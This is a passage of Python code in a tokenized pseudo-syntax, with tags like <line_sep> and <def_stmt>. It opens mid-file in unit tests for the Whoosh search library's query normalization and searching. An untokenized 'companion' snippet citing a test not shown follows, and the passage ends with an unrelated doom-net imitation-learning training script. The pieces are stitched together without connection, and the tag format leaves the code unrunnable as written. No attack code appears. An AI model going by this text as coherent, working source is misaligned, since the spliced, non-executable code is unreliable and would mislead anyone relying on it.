"juliet")])<line_sep>q2=And([Or([Term('v' 'bear' boost=2.0) Term('v' 'bee' boost=2.0) Term('v' 'brie' boost=2.0)]) Term('v' 'juliet')])<assert_stmt>q1.simplify(r)<eq>q2<block_end><def_stmt>test_merge_ranges <block_start>q=And([TermRange("f1" u("a") <none>) TermRange("f1" <none> u("z"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("z"))<line_sep>q=And([NumericRange("f1" <none> u("aaaaa")) NumericRange("f1" u("zzzzz") <none>)])<assert_stmt>q.normalize()<eq>q<line_sep>q=And([TermRange("f1" u("a") u("z")) TermRange("f1" "b" "x")])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("z"))<line_sep>q=And([TermRange("f1" u("a") u("m")) TermRange("f1" u("f") u("q"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("f") u("m"))<line_sep>q=Or([TermRange("f1" u("a") u("m")) TermRange("f1" u("f") u("q"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("q"))<line_sep>q=Or([TermRange("f1" u("m") <none>) TermRange("f1" <none> u("n"))])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Every("f1") Term("f1" "a") Variations("f1" "b")])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=Or([Term("f1" u("q")) TermRange("f1" u("m") <none>) TermRange("f1" <none> u("n"))])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Or([Term("f1" u("a")) Term("f1" u("b"))]) Every("f1")])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Term("f1" u("a")) And([Or([Every("f1")])])])<assert_stmt>q.normalize()<eq>Every("f1")<block_end><def_stmt>test_normalize_compound 
<block_start><def_stmt>oq <block_start><return>Or([Term("a" u("a")) Term("a" u("b"))])<block_end><def_stmt>nq level<block_start><if_stmt>level<eq>0<block_start><return>oq()<block_end><else_stmt><block_start><return>Or([nq(level-1) nq(level-1) nq(level-1)])<block_end><block_end>q=nq(5)<line_sep>q=q.normalize()<assert_stmt>q<eq>Or([Term("a" u("a")) Term("a" u("b"))])<block_end><def_stmt>test_duplicates <block_start>q=And([Term("a" u("b")) Term("a" u("b"))])<assert_stmt>q.normalize()<eq>Term("a" u("b"))<line_sep>q=And([Prefix("a" u("b")) Prefix("a" u("b"))])<assert_stmt>q.normalize()<eq>Prefix("a" u("b"))<line_sep>q=And([Variations("a" u("b")) And([Variations("a" u("b")) Term("a" u("b"))])])<assert_stmt>q.normalize()<eq>And([Variations("a" u("b")) Term("a" u("b"))])<line_sep>q=And([Term("a" u("b")) Prefix("a" u("b")) Term("a" u("b") boost=1.1)])<assert_stmt>q.normalize()<eq>q<line_sep># Wildcard without * or ? normalizes to Term q=And([Wildcard("a" u("b")) And([Wildcard("a" u("b")) Term("a" u("b"))])])<assert_stmt>q.normalize()<eq>Term("a" u("b"))<block_end># TODO: FIX THIS <def_stmt>test_query_copy_hash <block_start><def_stmt>do q1 q2<block_start>q1a=copy.deepcopy(q1)<assert_stmt>q1<eq>q1a<assert_stmt>hash(q1)<eq>hash(q1a)<assert_stmt>q1<ne>q2<block_end>do(Term("a" u("b") boost=1.1) Term("a" u("b") boost=1.5))<line_sep>do(And([Term("a" u("b")) Term("c" u("d"))] boost=1.1) And([Term("a" u("b")) Term("c" u("d"))] boost=1.5))<line_sep>do(Or([Term("a" u("b") boost=1.1) Term("c" u("d"))]) Or([Term("a" u("b") boost=1.8) Term("c" u("d"))] boost=1.5))<line_sep>do(DisjunctionMax([Term("a" u("b") boost=1.8) Term("c" u("d"))]) DisjunctionMax([Term("a" u("b") boost=1.1) Term("c" u("d"))] boost=1.5))<line_sep>do(Not(Term("a" u("b") boost=1.1)) Not(Term("a" u("b") boost=1.5)))<line_sep>do(Prefix("a" u("b") boost=1.1) Prefix("a" u("b") boost=1.5))<line_sep>do(Wildcard("a" u("b*x?") boost=1.1) Wildcard("a" u("b*x?") boost=1.5))<line_sep>do(FuzzyTerm("a" u("b") constantscore=<true>) FuzzyTerm("a" u("b") constantscore=<false>))<line_sep>do(FuzzyTerm("a" u("b") boost=1.1) FuzzyTerm("a" u("b") boost=1.5))<line_sep>do(TermRange("a" u("b") u("c")) TermRange("a" u("b") u("d")))<line_sep>do(TermRange("a" <none> u("c")) TermRange("a" <none> <none>))<line_sep>do(TermRange("a" u("b") u("c") boost=1.1) TermRange("a" u("b") u("c") boost=1.5))<line_sep>do(TermRange("a" u("b") u("c") constantscore=<true>) TermRange("a" u("b") u("c") constantscore=<false>))<line_sep>do(NumericRange("a" 1 5) NumericRange("a" 1 6))<line_sep>do(NumericRange("a" <none> 5) NumericRange("a" <none> <none>))<line_sep>do(NumericRange("a" 3 6 boost=1.1) NumericRange("a" 3 6 boost=1.5))<line_sep>do(NumericRange("a" 3 6 constantscore=<true>) NumericRange("a" 3 6 constantscore=<false>))<line_sep># do(DateRange) do(Variations("a" u("render")) Variations("a" u("renders")))<line_sep>do(Variations("a" u("render") boost=1.1) Variations("a" u("renders") boost=1.5))<line_sep>do(Phrase("a" [u("b") u("c") u("d")]) Phrase("a" [u("b") u("c") u("e")]))<line_sep>do(Phrase("a" [u("b") u("c") u("d")] boost=1.1) Phrase("a" [u("b") u("c") u("d")] boost=1.5))<line_sep>do(Phrase("a" [u("b") u("c") u("d")] slop=1) Phrase("a" [u("b") u("c") u("d")] slop=2))<line_sep># do(Ordered) do(Every() Every("a"))<line_sep>do(Every("a") Every("b"))<line_sep>do(Every("a" boost=1.1) Every("a" boost=1.5))<line_sep>do(NullQuery Term("a" u("b")))<line_sep>do(ConstantScoreQuery(Term("a" u("b"))) ConstantScoreQuery(Term("a" u("c"))))<line_sep>do(ConstantScoreQuery(Term("a" u("b")) score=2.0) 
ConstantScoreQuery(Term("a" u("c")) score=2.1))<line_sep>do(Require(Term("a" u("b")) Term("c" u("d"))) Require(Term("a" u("b") boost=1.1) Term("c" u("d"))))<line_sep># do(Require) # do(AndMaybe) # do(AndNot) # do(Otherwise) do(SpanFirst(Term("a" u("b")) limit=1) SpanFirst(Term("a" u("b")) limit=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d"))) SpanNear(Term("a" u("b")) Term("c" u("e"))))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) slop=1) SpanNear(Term("a" u("b")) Term("c" u("d")) slop=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) mindist=1) SpanNear(Term("a" u("b")) Term("c" u("d")) mindist=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) ordered=<true>) SpanNear(Term("a" u("b")) Term("c" u("d")) ordered=<false>))<line_sep>do(SpanNot(Term("a" u("b")) Term("a" u("c"))) SpanNot(Term("a" u("b")) Term("a" u("d"))))<line_sep>do(SpanOr([Term("a" u("b")) Term("a" u("c")) Term("a" u("d"))]) SpanOr([Term("a" u("b")) Term("a" u("c")) Term("a" u("e"))]))<line_sep>do(SpanContains(Term("a" u("b")) Term("a" u("c"))) SpanContains(Term("a" u("b")) Term("a" u("d"))))<line_sep># do(SpanBefore) # do(SpanCondition) <block_end><def_stmt>test_requires <block_start>a=Term("f" u("a"))<line_sep>b=Term("f" u("b"))<assert_stmt>And([a b]).requires()<eq>set([a b])<assert_stmt>Or([a b]).requires()<eq>set()<assert_stmt>AndMaybe(a b).requires()<eq>set([a])<assert_stmt>a.requires()<eq>set([a])<block_end><def_stmt>test_highlight_daterange <block_start><import_from_stmt>datetime datetime<line_sep>schema=fields.Schema(id=fields.ID(unique=<true> stored=<true>) title=fields.TEXT(stored=<true>) content=fields.TEXT(stored=<true>) released=fields.DATETIME(stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<line_sep>w=ix.writer()<line_sep>w.update_document(id=u('1') title=u('Life Aquatic') content=u('A nautic film crew sets out to kill a gigantic shark.') released=datetime(2004 12 25))<line_sep>w.update_document(id=u('2') title=u('Darjeeling Limited') content=u('Three brothers meet in India for a life changing train '+'journey.') released=datetime(2007 10 27))<line_sep>w.commit()<line_sep>s=ix.searcher()<line_sep>r=s.search(Term('content' u('train')) terms=<true>)<assert_stmt>len(r)<eq>1<assert_stmt>r[0]["id"]<eq>"2"<assert_stmt>(r[0].highlights("content")<eq>'for a life changing <b class="match term0">train</b> journey')<line_sep>r=s.search(DateRange('released' datetime(2007 1 1) <none>))<assert_stmt>len(r)<eq>1<assert_stmt>r[0].highlights("content")<eq>''<block_end><def_stmt>test_patterns <block_start>domain=u("aaron able acre adage aether after ago ahi aim ajax akimbo "<concat>"alembic all amiga amount ampere").split()<line_sep>schema=fields.Schema(word=fields.KEYWORD(stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start><for_stmt>word domain<block_start>w.add_document(word=word)<block_end><block_end><with_stmt>ix.reader()<as>r<block_start><assert_stmt>list(r.field_terms("word"))<eq>domain<assert_stmt>list(r.expand_prefix("word" "al"))<eq>[b("alembic") b("all")]<line_sep>q=query.Prefix("word" "al")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:alembic OR word:all)"<line_sep>q=query.Wildcard("word" "a*[ae]")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:able OR word:acre OR word:adage OR word:amiga OR word:ampere)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<line_sep>q=query.Regex("word" "am.*[ae]")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:amiga OR 
word:ampere)"<assert_stmt>q._find_prefix(q.text)<eq>"am"<line_sep>q=query.Regex("word" "able|ago")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:able OR word:ago)"<assert_stmt>q._find_prefix(q.text)<eq>""<line_sep># special case: ? may mean "zero occurences" q=query.Regex("word" "ah?i")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:ahi OR word:aim)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<line_sep># special case: * may mean "zero occurences" q=query.Regex("word" "ah*i")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:ahi OR word:aim)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<block_end><block_end><def_stmt>test_or_nots1 # Issue #285 <block_start>schema=fields.Schema(a=fields.KEYWORD(stored=<true>) b=fields.KEYWORD(stored=<true>))<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(a=u("alfa") b=u("charlie"))<block_end><with_stmt>ix.searcher()<as>s<block_start>q=query.And([query.Term("a" "alfa") query.Or([query.Not(query.Term("b" "bravo")) query.Not(query.Term("b" "charlie"))])])<line_sep>r=s.search(q)<assert_stmt>len(r)<eq>1<block_end><block_end><def_stmt>test_or_nots2 # Issue #286 <block_start>schema=fields.Schema(a=fields.KEYWORD(stored=<true>) b=fields.KEYWORD(stored=<true>))<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(b=u("bravo"))<block_end><with_stmt>ix.searcher()<as>s<block_start>q=query.Or([query.Term("a" "alfa") query.Not(query.Term("b" "alfa"))])<line_sep>r=s.search(q)<assert_stmt>len(r)<eq>1<block_end><block_end><def_stmt>test_or_nots3 <block_start>schema=fields.Schema(title=fields.TEXT(stored=<true>) itemtype=fields.ID(stored=<true>))<with_stmt>TempIndex(schema "ornot")<as>ix<block_start>w=ix.writer()<line_sep>w.add_document(title=u("a1") itemtype=u("a"))<line_sep>w.add_document(title=u("a2") itemtype=u("a"))<line_sep>w.add_document(title=u("b1") itemtype=u("b"))<line_sep>w.commit()<line_sep>q=Term('itemtype' 'a')|Not(Term('itemtype' 'a'))<with_stmt>ix.searcher()<as>s<block_start>r=" ".join([hit["title"]<for>hit s.search(q)])<assert_stmt>r<eq>"a1 a2 b1"<block_end><block_end><block_end><def_stmt>test_ornot_andnot <block_start>schema=fields.Schema(id=fields.NUMERIC(stored=<true>) a=fields.KEYWORD())<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 a=u("word1 word1"))<line_sep>w.add_document(id=1 a=u("word1 word2"))<line_sep>w.add_document(id=2 a=u("word1 foo"))<line_sep>w.add_document(id=3 a=u("foo word2"))<line_sep>w.add_document(id=4 a=u("foo bar"))<block_end><with_stmt>ix.searcher()<as>s<block_start>qp=qparser.QueryParser("a" ix.schema)<line_sep>q1=qp.parse(u("NOT word1 NOT word2"))<line_sep>q2=qp.parse(u("NOT (word1 OR word2)"))<line_sep>r1=[hit["id"]<for>hit s.search(q1 sortedby="id")]<line_sep>r2=[hit["id"]<for>hit s.search(q2 sortedby="id")]<assert_stmt>r1<eq>r2<eq>[4]<block_end><block_end><def_stmt>test_none_in_compounds <block_start><with_stmt>pytest.raises(query.QueryError)<block_start>_=query.And([query.Term("a" "b") <none> query.Term("c" "d")])<block_end><block_end><def_stmt>test_issue_355 <block_start>schema=fields.Schema(seats=fields.NUMERIC(bits=8 stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(seats=0)<line_sep>w.add_document(seats=10)<line_sep>w.add_document(seats=20)<block_end><with_stmt>ix.searcher()<as>s# Passing a bytestring for a numeric field <block_start>q=Term("seats" 
b("maker"))<line_sep>r1=[hit["seats"]<for>hit s.search(q limit=5)]<line_sep># Passing a unicode string for a numeric field q=Term("seats" u("maker"))<line_sep>r2=[hit["seats"]<for>hit s.search(q limit=5)]<line_sep># Passing a value too large for the numeric field q=Term("seats" 260)<line_sep>r3=[hit["seats"]<for>hit s.search(q limit=5)]<assert_stmt>r1<eq>r2<eq>r3<eq>[]<block_end><block_end><def_stmt>test_sequence <block_start>schema=fields.Schema(id=fields.STORED text=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 text=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(id=1 text=u("bravo charlie delta echo alfa"))<line_sep>w.add_document(id=2 text=u("charlie delta echo bravo"))<line_sep>w.add_document(id=3 text=u("delta echo charlie"))<line_sep>w.add_document(id=4 text=u("echo delta"))<block_end><with_stmt>ix.searcher()<as>s<block_start>seq=query.Sequence([query.Term("text" u("echo")) query.Term("text" u("alfa"))])<line_sep>q=query.And([query.Term("text" "bravo") seq])<line_sep>r=s.search(q limit=4)<assert_stmt>len(r)<eq>1<assert_stmt>r[0]["id"]<eq>1<block_end><block_end><def_stmt>test_andmaybe <block_start>schema=fields.Schema(id=fields.STORED text=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(id=0 text=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(id=1 text=u("bravo charlie delta echo alfa"))<line_sep>w.add_document(id=2 text=u("charlie delta echo bravo"))<line_sep>w.add_document(id=3 text=u("delta echo charlie"))<line_sep>w.add_document(id=4 text=u("echo delta"))<block_end>qp=qparser.QueryParser("text" schema)<line_sep>q=qp.parse(u('bravo ANDMAYBE "echo alfa"'))<with_stmt>ix.searcher()<as>s<block_start>r=s.search(q)<assert_stmt>len(r)<eq>3<assert_stmt>[hit["id"]<for>hit r]<eq>[1 2 0]<block_end><block_end><def_stmt>test_numeric_filter <block_start>schema=fields.Schema(status=fields.NUMERIC tags=fields.TEXT)<line_sep>ix=RamStorage().create_index(schema)<line_sep># Add a single document with status = -2 <with_stmt>ix.writer()<as>w<block_start>w.add_document(status=-2 tags=u"alfa bravo")<block_end><with_stmt>ix.searcher()<as>s# No document should match the filter <block_start>fq=query.NumericRange("status" 0 2)<line_sep>fr=s.search(fq)<assert_stmt>fr.scored_length()<eq>0<line_sep># Make sure the query would otherwise match q=query.Term("tags" u"alfa")<line_sep>r=s.search(q)<assert_stmt>r.scored_length()<eq>1<line_sep># Check the query doesn't match with the filter r=s.search(q filter=fq)<assert_stmt>r.scored_length()<eq>0<block_end><block_end><def_stmt>test_andnot_reverse # Bitbucket issue 419 <block_start>docs=['ruby' 'sapphire' 'ruby + sapphire']<line_sep>schema=fields.Schema(name=fields.TEXT(stored=<true>))<line_sep>q=query.AndNot(query.Term('name' 'ruby') query.Term('name' 'sapphire'))<with_stmt>TempIndex(schema)<as>ix<block_start><with_stmt>ix.writer()<as>w<block_start><for_stmt>name docs<block_start>w.add_document(name=u(name))<block_end><block_end><with_stmt>ix.searcher()<as>s<block_start>names_fw=[hit["name"]<for>hit s.search(q limit=<none>)]<block_end><block_end><with_stmt>TempIndex(schema)<as>ix<block_start><with_stmt>ix.writer()<as>w<block_start><for_stmt>name reversed(docs)<block_start>w.add_document(name=u(name))<block_end><block_end><with_stmt>ix.searcher()<as>s<block_start>names_rv=[hit["name"]<for>hit s.search(q 
limit=<none>)]<block_end><block_end><assert_stmt>len(names_fw)<eq>len(names_rv)<eq>1<assert_stmt>names_fw<eq>names_rv<block_end>
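A tiny standalone companion to the query-rewriting tests above: it exercises normalize() and replace() on hand-built query trees, matching the behaviour asserted in test_duplicates and test_replace (the field and term values here are made up).

# Standalone illustration of normalize()/replace() as exercised in the tests above.
from whoosh.query import And, Or, Term

q = And([Term("title", "alfa"), Term("title", "alfa")])
print(q.normalize())  # duplicate terms collapse to a single title:alfa (cf. test_duplicates)

q2 = Or([Term("title", "alfa"), Term("body", "bravo")])
print(q2.replace("title", "alfa", "charlie"))  # title:alfa rewritten to title:charlie (cf. test_replace)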
# # imitation_frames.py, doom-net # # Created by <NAME> on 01/21/17. # <import_stmt>os<import_stmt>time<import_stmt>h5py<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.optim<as>optim<import_from_stmt>device device<import_stmt>argparse<import_from_stmt>doom_instance *<import_from_stmt>aac BaseModel<def_stmt>data_generator args screens variables labels episodes step_size# remove short episodes <block_start>episode_min_size=args.episode_size<times>step_size<line_sep>episodes=episodes[episodes[: 1]-episodes[: 0]<g>episode_min_size]<line_sep>episodes_num=len(episodes)<line_sep># step_idx=episodes[: 0].copy()+np.random.randint(step_size size=episodes_num)<line_sep>step_screens=np.ndarray(shape=(args.batch_size *screens.shape[1:]) dtype=np.float32)<line_sep>step_variables=np.ndarray(shape=(args.batch_size *variables.shape[1:]) dtype=np.float32)<line_sep>step_labels=np.ndarray(shape=(args.batch_size ) dtype=np.int)<line_sep>step_terminals=np.ones(shape=(args.batch_size ) dtype=np.float32)<line_sep># select episodes for the initial batch batch_episodes=np.random.randint(episodes_num size=args.batch_size)<while_stmt><true><block_start><for_stmt>i range(args.batch_size)<block_start>idx=batch_episodes[i]<line_sep>step_screens[i :]=screens[step_idx[idx]]/127.5-1.0<line_sep>step_variables[i :]=variables[step_idx[idx]]/100<line_sep>step_labels[i]=labels[step_idx[idx]]<line_sep>step_idx[idx]<augadd>step_size<if_stmt>step_idx[idx]<g>episodes[idx][1]<block_start>step_idx[idx]=episodes[idx][0]+np.random.randint(step_size)<line_sep>step_terminals[i]=0<line_sep># reached terminal state, select a new episode batch_episodes[i]=np.random.randint(episodes_num)<block_end><else_stmt><block_start>step_terminals[i]=1<block_end><block_end><yield>torch.from_numpy(step_screens) torch.from_numpy(step_variables) torch.from_numpy(step_labels) torch.from_numpy(step_terminals)<block_end><block_end><def_stmt>train args<block_start>data_file=h5py.File(args.h5_path 'r')<line_sep>screens=data_file['screens']<line_sep>variables=data_file['variables']<line_sep>labels=data_file['action_labels']<line_sep>print('Dataset size =' len(screens))<line_sep>action_sets=data_file['action_sets'][:]<line_sep>episodes=data_file['episodes'][:]<line_sep>input_shape=screens[0].shape<line_sep>train_generator=data_generator(args screens variables labels episodes args.skiprate)<line_sep>np.save('action_set' action_sets)<line_sep>model=BaseModel(input_shape[0]<times>args.frame_num len(action_sets) variables.shape[1] args.frame_num).to(device)<if_stmt>args.load<is><not><none><and>os.path.isfile(args.load)<block_start>print("loading model parameters {}".format(args.load))<line_sep>source_model=torch.load(args.load)<line_sep>model.load_state_dict(source_model.state_dict())<del_stmt>source_model<block_end>criterion=nn.CrossEntropyLoss()<line_sep>optimizer=optim.AdamW(model.parameters() lr=5e-4)<line_sep>optimizer.zero_grad()<line_sep>running_loss=0<line_sep>running_accuracy=0<line_sep>batch_time=time.time()<for_stmt>batch,(screens variables labels terminals) enumerate(train_generator)<block_start>labels=labels.to(device)<line_sep>outputs,_=model(*model.transform_input(screens variables))<line_sep>loss=criterion(outputs 
labels)<line_sep>model.set_terminal(terminals)<line_sep>running_loss<augadd>loss.item()<line_sep>_,pred=outputs.max(1)<line_sep>accuracy=(pred<eq>labels).float().mean()<line_sep>running_accuracy<augadd>accuracy<line_sep>loss.backward()<line_sep>optimizer.step()<line_sep>optimizer.zero_grad()<if_stmt>batch%args.episode_length<eq>args.episode_length-1<block_start>running_loss<augdiv>args.episode_length<line_sep>running_accuracy<augdiv>args.episode_length<line_sep>print('[{:d}] loss: {:.3f}, accuracy: {:.3f}, time: {:.6f}'.format(batch+1 running_loss running_accuracy time.time()-batch_time))<line_sep>running_loss=0<line_sep>running_accuracy=0<line_sep>batch_time=time.time()<block_end><if_stmt>batch%args.checkpoint_rate<eq>args.checkpoint_rate-1<block_start>torch.save(model args.checkpoint_file)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Doom Imitation Learning')<line_sep>parser.add_argument('--episode_size' type=int default=20 help='number of steps in an episode')<line_sep>parser.add_argument('--batch_size' type=int default=64 help='number of game instances running in parallel')<line_sep>parser.add_argument('--load' default=<none> help='path to model file')<line_sep>parser.add_argument('--h5_path' default=os.path.expanduser('~')+'/test/datasets/vizdoom/cig_map01/flat.h5' help='hdf5 file path')<line_sep>parser.add_argument('--skiprate' type=int default=2 help='number of skipped frames')<line_sep>parser.add_argument('--episode_length' type=int default=30 help='episode length')<line_sep>parser.add_argument('--frame_num' type=int default=4 help='number of frames per input')<line_sep>parser.add_argument('--checkpoint_file' default=<none> help='checkpoint file name')<line_sep>parser.add_argument('--checkpoint_rate' type=int default=5000 help='number of batches per checkpoint')<line_sep>args=parser.parse_args()<line_sep>train(args)<block_end>